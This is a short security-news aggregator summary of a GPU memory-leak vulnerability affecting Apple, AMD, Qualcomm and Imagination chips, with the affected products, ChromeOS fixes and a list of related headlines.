Security News > 2024 > January > Apple, AMD, Qualcomm GPU security hole lets miscreants snoop on AI training and chats

Research made public on Tuesday detailed how miscreants can exploit the hole to read data they're not supposed to in a system's local GPU memory.
While the flaw potentially affects all GPU applications on vulnerable chips, it is especially concerning for those processing machine-learning applications because of the amount of data these models process using GPUs, and therefore the amount of potentially sensitive information that could be swiped by exploiting this issue.
The chip house also confirmed that a lot of its products are vulnerable to the memory leak, including multiple versions of its Athlon and Ryzen desktop and mobile processors, Radeon graphics cards, and Radeon and Instinct data center GPUs.
Google pointed out to Trail of Bits that some Imagination GPUs are impacted, and that the processor designer released a fix for its holes last month.
Google is aware of this vulnerability impacting AMD, Apple, and Qualcomm GPUs.
Google has released fixes for ChromeOS devices with impacted AMD and Qualcomm GPUs as part of the 120 and 114 releases in the Stable and LTS channels, respectively.
News URL
https://go.theregister.com/feed/www.theregister.com/2024/01/17/leftoverlocals_gpu_flaw/
Related news
- Taiwan Bans DeepSeek AI Over National Security Concerns, Citing Data Leakage Risks (source)
- On Generative AI Security (source)
- Yup, AMD's Elba and Giglio definitely sound like they work corporate security (source)
- AI and Security - A New Puzzle to Figure Out (source)
- Google Chrome's AI-powered security feature rolls out to everyone (source)
- ⚡ THN Weekly Recap: From $1.5B Crypto Heist to AI Misuse & Apple’s Data Dilemma (source)
- Qualcomm pledges 8 years of security updates for Android kit using its chips (YMMV) (source)
- CrowdStrike Security Report: Generative AI Powers Social Engineering Attacks (source)
- Nearly 12,000 API keys and passwords found in AI training dataset (source)
- Innovation vs. security: Managing shadow AI risks (source)